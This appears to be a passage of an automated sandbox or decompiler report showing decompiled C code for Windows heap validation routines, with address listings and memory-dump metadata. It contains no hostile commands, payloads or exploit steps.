                                                        																	goto L105;
                                                        																}
                                                        																_t607 = _a4;
                                                        																__eflags =  *(_t607 + 8);
                                                        																_t511 = _v16;
                                                        																if( *(_t607 + 8) != 0) {
                                                        																	_t511 = _t511 + _t511;
                                                        																	__eflags = _t511;
                                                        																}
                                                        																_t471 =  *( *((intOrPtr*)(_t607 + 0x20)) + _t511 * 4);
                                                        																while(1) {
                                                        																	__eflags = _v12 - _t471;
                                                        																	if(_v12 == _t471) {
                                                        																		goto L121;
                                                        																	}
                                                        																	__eflags = _t633;
                                                        																	if(_t633 == 0) {
                                                        																		_t609 =  *(_t471 - 8) & 0x0000ffff;
                                                        																	} else {
                                                        																		_t611 =  *(_t471 - 8);
                                                        																		_t633 =  *(_t670 + 0x4c);
                                                        																		__eflags = _t611 & _t633;
                                                        																		if((_t611 & _t633) != 0) {
                                                        																			_t611 = _t611 ^  *(_t670 + 0x50);
                                                        																			__eflags = _t611;
                                                        																		}
                                                        																		_t609 = _t611 & 0x0000ffff;
                                                        																	}
                                                        																	__eflags = _v20 - (_t609 & 0x0000ffff);
                                                        																	if(_v20 - (_t609 & 0x0000ffff) <= 0) {
                                                        																		goto L119;
                                                        																	} else {
                                                        																		_t471 =  *_t471;
                                                        																		continue;
                                                        																	}
                                                        																	goto L105;
                                                        																}
                                                        																goto L121;
                                                        															} else {
                                                        																_t471 =  *_v12;
                                                        																goto L119;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        												_t467 = _t583;
                                                        											}
                                                        											_t630 = _t537;
                                                        											_v28 = _t537;
                                                        											goto L75;
                                                        										}
                                                        										_t472 =  *(_t670 + 0xc4);
                                                        										goto L64;
                                                        									}
                                                        									_t515 = E00B761FE(_t671, __eflags);
                                                        									__eflags = _t515;
                                                        									if(_t515 != 0) {
                                                        										goto L62;
                                                        									}
                                                        									E00B6EE4C(_t536, _t670, _t670, _t671,  *_t671 & 0x0000ffff, 1);
                                                        									goto L174;
                                                        								}
                                                        								_t613 =  *_t671 & 0x0000ffff;
                                                        								while(1) {
                                                        									__eflags = _t613 -  *(_t465 + 4);
                                                        									if(_t613 <  *(_t465 + 4)) {
                                                        										break;
                                                        									}
                                                        									_t654 =  *_t465;
                                                        									__eflags = _t654;
                                                        									if(_t654 == 0) {
                                                        										_t536 =  *(_t465 + 4) - 1;
                                                        										__eflags = _t536;
                                                        										_a4 = _t536;
                                                        										L37:
                                                        										_t615 = _t536 -  *((intOrPtr*)(_t465 + 0x14));
                                                        										__eflags =  *(_t465 + 8);
                                                        										_v20 = _t615;
                                                        										if( *(_t465 + 8) != 0) {
                                                        											_t615 = _t615 + _t615;
                                                        											__eflags = _t615;
                                                        										}
                                                        										_t616 = _t615 << 2;
                                                        										_t656 =  *((intOrPtr*)(_t465 + 0x20)) + _t616;
                                                        										_v28 = _t616;
                                                        										 *((intOrPtr*)(_t465 + 0xc)) =  *((intOrPtr*)(_t465 + 0xc)) - 1;
                                                        										_v16 =  *_t656;
                                                        										__eflags = _t536 -  *(_t465 + 4) - 1;
                                                        										if(_t536 ==  *(_t465 + 4) - 1) {
                                                        											_t69 = _t465 + 0x10;
                                                        											 *_t69 =  *(_t465 + 0x10) - 1;
                                                        											__eflags =  *_t69;
                                                        										}
                                                        										__eflags = _v16 - _t671 + 8;
                                                        										if(_v16 != _t671 + 8) {
                                                        											goto L58;
                                                        										} else {
                                                        											__eflags =  *_t465;
                                                        											_t621 =  *(_t465 + 4);
                                                        											if( *_t465 == 0) {
                                                        												_t621 = _t621 - 1;
                                                        												__eflags = _t621;
                                                        											}
                                                        											__eflags = _a4 - _t621;
                                                        											_t622 =  *(_t671 + 8);
                                                        											if(_a4 >= _t621) {
                                                        												__eflags = _t622 -  *((intOrPtr*)(_t465 + 0x18));
                                                        												if(_t622 ==  *((intOrPtr*)(_t465 + 0x18))) {
                                                        													 *_t656 =  *_t656 & 0x00000000;
                                                        													__eflags =  *_t656;
                                                        													goto L57;
                                                        												}
                                                        												 *_t656 = _t622;
                                                        												goto L58;
                                                        											} else {
                                                        												__eflags = _t622 -  *((intOrPtr*)(_t465 + 0x18));
                                                        												if(_t622 ==  *((intOrPtr*)(_t465 + 0x18))) {
                                                        													L53:
                                                        													 *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) =  *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) & 0x00000000;
                                                        													L57:
                                                        													_t623 = _v20;
                                                        													_t519 =  *((intOrPtr*)(_t465 + 0x1c)) + (_t623 >> 5) * 4;
                                                        													 *_t519 =  *_t519 &  !(1 << (_t623 & 0x0000001f));
                                                        													__eflags =  *_t519;
                                                        													goto L58;
                                                        												}
                                                        												__eflags =  *(_t670 + 0x4c);
                                                        												if( *(_t670 + 0x4c) == 0) {
                                                        													_t664 =  *(_t622 - 8) & 0x0000ffff;
                                                        												} else {
                                                        													_t667 =  *(_t622 - 8);
                                                        													__eflags =  *(_t670 + 0x4c) & _t667;
                                                        													if(( *(_t670 + 0x4c) & _t667) != 0) {
                                                        														_t667 = _t667 ^  *(_t670 + 0x50);
                                                        														__eflags = _t667;
                                                        													}
                                                        													_t664 = _t667 & 0x0000ffff;
                                                        												}
                                                        												_t536 = ( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff);
                                                        												__eflags = ( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff);
                                                        												if(( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff)) {
                                                        													goto L53;
                                                        												} else {
                                                        													 *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) = _t622;
                                                        													goto L58;
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        									_t465 = _t654;
                                                        								}
                                                        								_t536 = _t613;
                                                        								_a4 = _t613;
                                                        								goto L37;
                                                        							}
                                                        						}
                                                        						if(_a28 == _t532) {
                                                        							L19:
                                                        							if(( *(_t671 + 2) & 0x00000004) == 0 || E00BD579A(_t568, _t670, _t671) != 0) {
                                                        								goto L155;
                                                        							} else {
                                                        								goto L183;
                                                        							}
                                                        						} else {
                                                        							if((_t380 & 0x00000002) == 0) {
                                                        								_t523 =  *(_t671 + 3) & 0xff;
                                                        							} else {
                                                        								_t523 =  *(E00B72568(_t671) + 2) & 0x0000ffff;
                                                        							}
                                                        							if(_t523 == _t532) {
                                                        								goto L19;
                                                        							}
                                                        							if((_t523 & 0x00008000) == 0) {
                                                        								__eflags = _t523 & 0x00000800;
                                                        								if((_t523 & 0x00000800) != 0) {
                                                        									goto L19;
                                                        								}
                                                        								__eflags = _t523 -  *((intOrPtr*)(_t670 + 0x88));
                                                        								if(_t523 >=  *((intOrPtr*)(_t670 + 0x88))) {
                                                        									goto L19;
                                                        								}
                                                        								_t626 = _a28;
                                                        								L18:
                                                        								_t568 =  *_t671 & 0x0000ffff;
                                                        								 *((intOrPtr*)(_t626 + (_t523 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t626 + (_t523 & 0x0000ffff) * 4)) + ( *_t671 & 0x0000ffff);
                                                        								goto L19;
                                                        							}
                                                        							_t523 = _t523 & 0x00007fff;
                                                        							_t568 = 0x81;
                                                        							if(_t523 >= 0x81) {
                                                        								goto L19;
                                                        							} else {
                                                        								_t626 = _a32;
                                                        								goto L18;
                                                        							}
                                                        						}
                                                        						L174:
                                                        						__eflags = _t671 -  *((intOrPtr*)(_a8 + 0x28));
                                                        					} while (__eflags < 0);
                                                        					_t671 = _a8;
                                                        					_t339 = 0;
                                                        					__eflags = 0;
                                                        					goto L176;
                                                        				}
                                                        			}

                                                        0x00befe22
                                                        0x00befe23
                                                        0x00befe23
                                                        0x00befe1e
                                                        0x00befe34
                                                        0x00bf04ad
                                                        0x00bf04b0
                                                        0x00bf04b3
                                                        0x00bf04d5
                                                        0x00bf04da
                                                        0x00bf04b5
                                                        0x00bf04cd
                                                        0x00bf04d2
                                                        0x00bf04e8
                                                        0x00bf04ed
                                                        0x00bf04ed
                                                        0x00bf04ef
                                                        0x00bf04f6
                                                        0x00bf04fe
                                                        0x00bf04fe
                                                        0x00bf0501
                                                        0x00bf0501
                                                        0x00bf050b
                                                        0x00bf0511
                                                        0x00bf0511
                                                        0x00bf0513
                                                        0x00000000
                                                        0x00bf0513
                                                        0x00befe3a
                                                        0x00befe40
                                                        0x00befe43
                                                        0x00befe4b
                                                        0x00befe4e
                                                        0x00befe53
                                                        0x00befece
                                                        0x00befed2
                                                        0x00bf0383
                                                        0x00bf0386
                                                        0x00bf038b
                                                        0x00bf038e
                                                        0x00bf038e
                                                        0x00bf0390
                                                        0x00bf0390
                                                        0x00bf0393
                                                        0x00bf0395
                                                        0x00bf03ad
                                                        0x00bf0397
                                                        0x00bf03a6
                                                        0x00bf03a6
                                                        0x00bf03af
                                                        0x00bf03b2
                                                        0x00bf03b4
                                                        0x00bf0576
                                                        0x00bf0579
                                                        0x00bf057c
                                                        0x00bf059e
                                                        0x00bf05a3
                                                        0x00bf057e
                                                        0x00bf0596
                                                        0x00bf059b
                                                        0x00bf05ad
                                                        0x00bf05ae
                                                        0x00bf05af
                                                        0x00000000
                                                        0x00bf03ba
                                                        0x00bf03ba
                                                        0x00bf03be
                                                        0x00bf043c
                                                        0x00bf043f
                                                        0x00bf0449
                                                        0x00bf044f
                                                        0x00bf044f
                                                        0x00bf044f
                                                        0x00bf0451
                                                        0x00bf0451
                                                        0x00000000
                                                        0x00bf0451
                                                        0x00bf03c0
                                                        0x00bf03c3
                                                        0x00bf03c5
                                                        0x00bf05c1
                                                        0x00bf05c7
                                                        0x00bf05ca
                                                        0x00bf0613
                                                        0x00bf0616
                                                        0x00bf0620
                                                        0x00bf0626
                                                        0x00bf0626
                                                        0x00bf0626
                                                        0x00bf0628
                                                        0x00000000
                                                        0x00bf0628
                                                        0x00bf05d2
                                                        0x00bf05d5
                                                        0x00bf05d8
                                                        0x00bf05fa
                                                        0x00bf05ff
                                                        0x00bf05da
                                                        0x00bf05f2
                                                        0x00bf05f7
                                                        0x00bf0608
                                                        0x00bf060b
                                                        0x00bf060c
                                                        0x00bf05b4
                                                        0x00bf05b4
                                                        0x00000000
                                                        0x00bf05b9
                                                        0x00bf03cb
                                                        0x00bf03d1
                                                        0x00bf03d4
                                                        0x00bf03d7
                                                        0x00bf03e1
                                                        0x00bf03e7
                                                        0x00bf03e7
                                                        0x00bf03e7
                                                        0x00bf03ec
                                                        0x00bf03f0
                                                        0x00bf03f3
                                                        0x00bf0437
                                                        0x00bf0437
                                                        0x00000000
                                                        0x00bf03f5
                                                        0x00bf03f5
                                                        0x00bf03f8
                                                        0x00bf03fd
                                                        0x00bf0407
                                                        0x00bf040a
                                                        0x00bf040c
                                                        0x00bf040d
                                                        0x00bf040e
                                                        0x00bf040f
                                                        0x00bf040f
                                                        0x00bf040a
                                                        0x00bf0418
                                                        0x00bf041c
                                                        0x00bf0637
                                                        0x00bf063a
                                                        0x00bf063d
                                                        0x00bf065f
                                                        0x00bf0664
                                                        0x00bf063f
                                                        0x00bf0657
                                                        0x00bf065c
                                                        0x00bf0674
                                                        0x00bf0675
                                                        0x00bf0676
                                                        0x00000000
                                                        0x00bf0422
                                                        0x00bf0422
                                                        0x00bf0425
                                                        0x00bf042f
                                                        0x00bf0435
                                                        0x00bf0435
                                                        0x00bf0435
                                                        0x00000000
                                                        0x00bf0425
                                                        0x00bf041c
                                                        0x00bf03f3
                                                        0x00bf03b4
                                                        0x00befed8
                                                        0x00befeda
                                                        0x00000000
                                                        0x00000000
                                                        0x00befee3
                                                        0x00befee6
                                                        0x00befee8
                                                        0x00befeea
                                                        0x00befeed
                                                        0x00befeef
                                                        0x00befeef
                                                        0x00befeef
                                                        0x00befeed
                                                        0x00befef2
                                                        0x00befef4
                                                        0x00bf0371
                                                        0x00bf0376
                                                        0x00bf0379
                                                        0x00bf037b
                                                        0x00bf0520
                                                        0x00bf0523
                                                        0x00bf0527
                                                        0x00bf0549
                                                        0x00bf054e
                                                        0x00bf0529
                                                        0x00bf0541
                                                        0x00bf0546
                                                        0x00bf055b
                                                        0x00bf0562
                                                        0x00bf056a
                                                        0x00000000
                                                        0x00bf056a
                                                        0x00bf0381
                                                        0x00bf0381
                                                        0x00000000
                                                        0x00befefa
                                                        0x00befefa
                                                        0x00befefd
                                                        0x00beff00
                                                        0x00beff02
                                                        0x00beff05
                                                        0x00beff08
                                                        0x00beff0b
                                                        0x00beff0d
                                                        0x00beff0f
                                                        0x00bf002b
                                                        0x00bf002b
                                                        0x00bf002d
                                                        0x00bf002e
                                                        0x00bf002f
                                                        0x00bf0030
                                                        0x00bf0031
                                                        0x00bf0033
                                                        0x00000000
                                                        0x00bf0033
                                                        0x00beff15
                                                        0x00beff17
                                                        0x00000000
                                                        0x00000000
                                                        0x00beff1d
                                                        0x00beff23
                                                        0x00beff26
                                                        0x00beff28
                                                        0x00befffb
                                                        0x00befffb
                                                        0x00befffe
                                                        0x00bf0001
                                                        0x00bf0003
                                                        0x00bf0006
                                                        0x00bf000a
                                                        0x00bf003d
                                                        0x00bf003d
                                                        0x00bf0040
                                                        0x00bf0044
                                                        0x00bf0048
                                                        0x00bf004e
                                                        0x00bf0051
                                                        0x00bf0053
                                                        0x00bf0091
                                                        0x00bf0091
                                                        0x00bf0094
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0089
                                                        0x00bf008b
                                                        0x00bf008d
                                                        0x00bf00a0
                                                        0x00bf00a0
                                                        0x00bf00a1
                                                        0x00bf00a4
                                                        0x00bf00a4
                                                        0x00bf00a7
                                                        0x00bf00a9
                                                        0x00bf00ac
                                                        0x00bf00af
                                                        0x00bf00b2
                                                        0x00bf00b5
                                                        0x00bf00b8
                                                        0x00bf00ba
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf00bc
                                                        0x00bf00bc
                                                        0x00bf023c
                                                        0x00bf023c
                                                        0x00bf023f
                                                        0x00bf0241
                                                        0x00bf005b
                                                        0x00bf005b
                                                        0x00bf005b
                                                        0x00bf0061
                                                        0x00bf0063
                                                        0x00bf0272
                                                        0x00bf0272
                                                        0x00bf0275
                                                        0x00bf0277
                                                        0x00bf0279
                                                        0x00bf028a
                                                        0x00bf028c
                                                        0x00bf028d
                                                        0x00bf028e
                                                        0x00bf028f
                                                        0x00bf0290
                                                        0x00bf0291
                                                        0x00bf0293
                                                        0x00bf027b
                                                        0x00bf027b
                                                        0x00bf027e
                                                        0x00bf0280
                                                        0x00bf0283
                                                        0x00bf0285
                                                        0x00bf0285
                                                        0x00bf029b
                                                        0x00bf029e
                                                        0x00bf02a4
                                                        0x00bf02a6
                                                        0x00bf0348
                                                        0x00bf0348
                                                        0x00bf034c
                                                        0x00bf035a
                                                        0x00bf0360
                                                        0x00bf0360
                                                        0x00000000
                                                        0x00bf02ac
                                                        0x00bf02ac
                                                        0x00bf02b9
                                                        0x00bf02b9
                                                        0x00bf02bc
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf02b1
                                                        0x00bf02b3
                                                        0x00bf02b5
                                                        0x00bf02c5
                                                        0x00bf02c5
                                                        0x00bf02c6
                                                        0x00bf02c8
                                                        0x00bf02cb
                                                        0x00bf02cf
                                                        0x00bf02d2
                                                        0x00bf02d4
                                                        0x00bf02d4
                                                        0x00bf02d4
                                                        0x00bf02d6
                                                        0x00bf02dc
                                                        0x00bf02df
                                                        0x00bf02e2
                                                        0x00bf02e9
                                                        0x00bf02ec
                                                        0x00bf02ee
                                                        0x00bf02f0
                                                        0x00bf02f0
                                                        0x00bf02f0
                                                        0x00bf02f0
                                                        0x00bf02f3
                                                        0x00bf02f5
                                                        0x00bf031d
                                                        0x00bf0326
                                                        0x00bf0329
                                                        0x00000000
                                                        0x00bf02f7
                                                        0x00bf02f7
                                                        0x00bf02fb
                                                        0x00bf030d
                                                        0x00bf02fd
                                                        0x00bf02fd
                                                        0x00bf0300
                                                        0x00bf0303
                                                        0x00bf0305
                                                        0x00bf0305
                                                        0x00bf0305
                                                        0x00bf0308
                                                        0x00bf0308
                                                        0x00bf0319
                                                        0x00bf031b
                                                        0x00bf032c
                                                        0x00bf032c
                                                        0x00bf032e
                                                        0x00bf0330
                                                        0x00bf033b
                                                        0x00bf0346
                                                        0x00bf0346
                                                        0x00bf0346
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf031b
                                                        0x00bf02f5
                                                        0x00bf02b7
                                                        0x00bf02b7
                                                        0x00bf02be
                                                        0x00000000
                                                        0x00bf02be
                                                        0x00bf02a6
                                                        0x00bf0069
                                                        0x00bf006c
                                                        0x00bf006c
                                                        0x00bf006e
                                                        0x00bf025c
                                                        0x00bf0074
                                                        0x00bf0074
                                                        0x00bf0077
                                                        0x00bf007a
                                                        0x00bf007c
                                                        0x00bf007e
                                                        0x00bf007e
                                                        0x00bf007e
                                                        0x00bf0081
                                                        0x00bf0081
                                                        0x00bf0263
                                                        0x00bf0266
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0268
                                                        0x00bf026a
                                                        0x00bf026c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf026c
                                                        0x00000000
                                                        0x00bf006c
                                                        0x00bf024a
                                                        0x00bf024c
                                                        0x00bf024f
                                                        0x00bf0252
                                                        0x00bf0254
                                                        0x00bf00a9
                                                        0x00bf00ac
                                                        0x00bf00af
                                                        0x00bf00b2
                                                        0x00bf00b5
                                                        0x00bf00b8
                                                        0x00bf00ba
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf00c4

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        • API String ID: 0-3591852110
                                                        • Opcode ID: 26fa3c386d165d24a94bc6e60d5299dd1815c2c05643c296c66e74c517cf87a3
                                                        • Instruction ID: 68c89e9eabd4372fffc99feb951ced065613507d8cb304cd36472caac74397ca
                                                        • Opcode Fuzzy Hash: 26fa3c386d165d24a94bc6e60d5299dd1815c2c05643c296c66e74c517cf87a3
                                                        • Instruction Fuzzy Hash: 5B62CE7061064ADFCB24DF69C4C0A7AB7F1FF49700B1484E9EA868B662D734ED49DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00BF098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int* _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed int* _t165;
                                                        				intOrPtr _t168;
                                                        				signed short _t181;
                                                        				intOrPtr _t183;
                                                        				signed int* _t204;
                                                        				signed int _t209;
                                                        				signed int _t214;
                                                        				signed int* _t216;
                                                        				signed int _t226;
                                                        				signed int _t228;
                                                        				signed int _t233;
                                                        				intOrPtr _t235;
                                                        				intOrPtr _t246;
                                                        				intOrPtr _t257;
                                                        				signed int _t280;
                                                        				signed int* _t281;
                                                        				signed int* _t282;
                                                        				signed short _t284;
                                                        				signed short _t286;
                                                        				signed char _t288;
                                                        				intOrPtr* _t298;
                                                        				signed int _t309;
                                                        				signed int _t310;
                                                        				signed int* _t311;
                                                        				unsigned int _t312;
                                                        				signed int* _t313;
                                                        				signed int _t314;
                                                        				signed int _t315;
                                                        				intOrPtr _t316;
                                                        				signed int _t317;
                                                        				signed int _t318;
                                                        				signed int _t319;
                                                        
                                                        				_t308 = __edx;
                                                        				_t311 = _a4;
                                                        				_v12 = 0;
                                                        				_v8 = 0;
                                                        				_v16 = _t311;
                                                        				if(E00BEFB7A(__ecx, __edx, _t311, 0) == 0) {
                                                        					L84:
                                                        					E00BF06F9(_v16);
                                                        					_t337 = _v8;
                                                        					if(_v8 != 0) {
                                                        						_a4 = _a4 & 0x00000000;
                                                        						E00B54167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                                        					}
                                                        					L48:
                                                        					return 0;
                                                        				}
                                                        				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
                                                        					_t308 = 0;
                                                        					_t165 =  &(_t311[0x31]);
                                                        					_t280 =  *_t165;
                                                        					_a8 = 0;
                                                        					_v24 = 0;
                                                        					while(_t165 != _t280) {
                                                        						_t280 =  *_t280;
                                                        						_a4 =  *_t313 & 0x0000ffff;
                                                        						_t288 = _t313[0];
                                                        						_v16 = _t313;
                                                        						__eflags = _t288 & 0x00000001;
                                                        						if((_t288 & 0x00000001) != 0) {
                                                        							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        							__eflags =  *(_t168 + 0xc);
                                                        							if( *(_t168 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E00B9373B();
                                                        							} else {
                                                        								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push(_t313);
                                                        							E00B9373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
                                                        							L22:
                                                        							__eflags = _t311[0x13];
                                                        							if(_t311[0x13] != 0) {
                                                        								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
                                                        								 *_t313 =  *_t313 ^ _t311[0x14];
                                                        							}
                                                        							goto L84;
                                                        						}
                                                        						_t181 =  *_t313 & 0x0000ffff;
                                                        						__eflags = _t181 - _v24;
                                                        						if(_t181 < _v24) {
                                                        							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        							__eflags =  *(_t183 + 0xc);
                                                        							if( *(_t183 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E00B9373B();
                                                        							} else {
                                                        								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							E00B9373B("Non-Dedicated free list element %p is out of order\n", _t313);
                                                        							goto L22;
                                                        						}
                                                        						_t308 = 0;
                                                        						_v24 = _t181 & 0x0000ffff;
                                                        						__eflags = _t311[0x13];
                                                        						if(_t311[0x13] != 0) {
                                                        							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
                                                        							 *_t313 =  *_t313 ^ _t311[0x14];
                                                        							__eflags =  *_t313;
                                                        						}
                                                        						_t29 =  &_a8;
                                                        						 *_t29 = _a8 + 1;
                                                        						__eflags =  *_t29;
                                                        						_t165 =  &(_t311[0x31]);
                                                        					}
                                                        					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
                                                        					if( *0xc292a4 != 0 && _t311[0x30] != _t308) {
                                                        						_push(4);
                                                        						_push(0x1000);
                                                        						_push( &_a4);
                                                        						_push(0);
                                                        						_push( &_v8);
                                                        						if(E00B3FAD0(0xffffffff) >= 0) {
                                                        							_v12 = _v8 + 0x204;
                                                        						}
                                                        					}
                                                        					_t204 =  &(_t311[0x28]);
                                                        					_t314 =  *_t204;
                                                        					while(_t204 != _t314) {
                                                        						__eflags = _t311[0x13];
                                                        						_t281 = _t314 + 0x18;
                                                        						if(_t311[0x13] != 0) {
                                                        							 *_t281 =  *_t281 ^ _t311[0x14];
                                                        							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
                                                        							if(__eflags != 0) {
                                                        								_push(0);
                                                        								_push(_t281);
                                                        								_push(_t311);
                                                        								E00BEF8EE(_t281, _t311, _t314, __eflags);
                                                        							}
                                                        						}
                                                        						_t295 = _v12;
                                                        						__eflags = _t295;
                                                        						if(_t295 == 0) {
                                                        							L39:
                                                        							__eflags =  *(_t314 + 0x1a) & 0x00000004;
                                                        							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
                                                        								L41:
                                                        								__eflags = _t311[0x13];
                                                        								if(_t311[0x13] != 0) {
                                                        									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
                                                        									 *_t281 =  *_t281 ^ _t311[0x14];
                                                        									__eflags =  *_t281;
                                                        								}
                                                        								_t314 =  *_t314;
                                                        								_t204 =  &(_t311[0x28]);
                                                        								continue;
                                                        							}
                                                        							_t209 = E00BD579A(_t295, _t311, _t281);
                                                        							__eflags = _t209;
                                                        							if(_t209 == 0) {
                                                        								__eflags = _t311[0x13];
                                                        								if(_t311[0x13] != 0) {
                                                        									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
                                                        									_t95 = _t314 + 0x18;
                                                        									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
                                                        									__eflags =  *_t95;
                                                        								}
                                                        								goto L48;
                                                        							}
                                                        							goto L41;
                                                        						} else {
                                                        							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
                                                        							__eflags = _t214;
                                                        							if(_t214 == 0) {
                                                        								goto L39;
                                                        							}
                                                        							__eflags = _t214 & 0x00008000;
                                                        							if((_t214 & 0x00008000) == 0) {
                                                        								__eflags = _t214 & 0x00000800;
                                                        								if((_t214 & 0x00000800) != 0) {
                                                        									goto L39;
                                                        								}
                                                        								__eflags = _t214 - _t311[0x22];
                                                        								if(_t214 >= _t311[0x22]) {
                                                        									goto L39;
                                                        								}
                                                        								L38:
                                                        								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
                                                        								_t295 =  *(_t314 + 0x10) >> 3;
                                                        								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
                                                        								__eflags =  *_t216;
                                                        								goto L39;
                                                        							}
                                                        							_t214 = _t214 & 0x00007fff;
                                                        							_t295 = 0x81;
                                                        							__eflags = _t214 - 0x81;
                                                        							if(_t214 >= 0x81) {
                                                        								goto L39;
                                                        							}
                                                        							_t295 = _v8;
                                                        							goto L38;
                                                        						}
                                                        					}
                                                        					_v20 = _v20 & 0x00000000;
                                                        					_v24 = _v24 & 0x00000000;
                                                        					_t282 =  &(_t311[0x2a]);
                                                        					_t315 =  *_t282;
                                                        					while(_t315 != _t282) {
                                                        						_t226 = E00BEFDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
                                                        						__eflags = _t226;
                                                        						if(_t226 == 0) {
                                                        							goto L84;
                                                        						}
                                                        						_t315 =  *_t315;
                                                        					}
                                                        					_t316 = _a8;
                                                        					_v16 = _t311;
                                                        					if(_t316 == _v20) {
                                                        						__eflags = _t311[0x1e] - _v24;
                                                        						if(_t311[0x1e] == _v24) {
                                                        							_t228 = _v8;
                                                        							__eflags = _t228;
                                                        							if(_t228 == 0) {
                                                        								goto L74;
                                                        							}
                                                        							_t317 = _t311[0x30];
                                                        							__eflags = _t317;
                                                        							if(_t317 == 0) {
                                                        								L68:
                                                        								_t318 = _t311[0x23];
                                                        								__eflags = _t318;
                                                        								if(__eflags == 0) {
                                                        									L73:
                                                        									_a4 = 0;
                                                        									E00B54167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                                        									goto L74;
                                                        								}
                                                        								_t233 = _t311[0x22] & 0x0000ffff;
                                                        								_t284 = 1;
                                                        								_t308 = 1;
                                                        								__eflags = 1 - _t233;
                                                        								if(__eflags >= 0) {
                                                        									goto L73;
                                                        								}
                                                        								_t312 = _v12;
                                                        								while(1) {
                                                        									_t309 = _t284 & 0x0000ffff;
                                                        									_t308 =  *(_t312 + _t309 * 4);
                                                        									_t318 = _t318 + 0x40;
                                                        									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
                                                        									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
                                                        										break;
                                                        									}
                                                        									_t284 = _t284 + 1;
                                                        									__eflags = _t284 - _t233;
                                                        									if(__eflags < 0) {
                                                        										continue;
                                                        									}
                                                        									goto L73;
                                                        								}
                                                        								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        								__eflags =  *(_t235 + 0xc);
                                                        								if( *(_t235 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E00B9373B();
                                                        								} else {
                                                        									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
                                                        								_push(_t298);
                                                        								_push( *_t298);
                                                        								_t319 = _t318 + 0x10;
                                                        								__eflags = _t319;
                                                        								_push( *((intOrPtr*)(_t319 - 8)));
                                                        								_push(_t319);
                                                        								E00B9373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
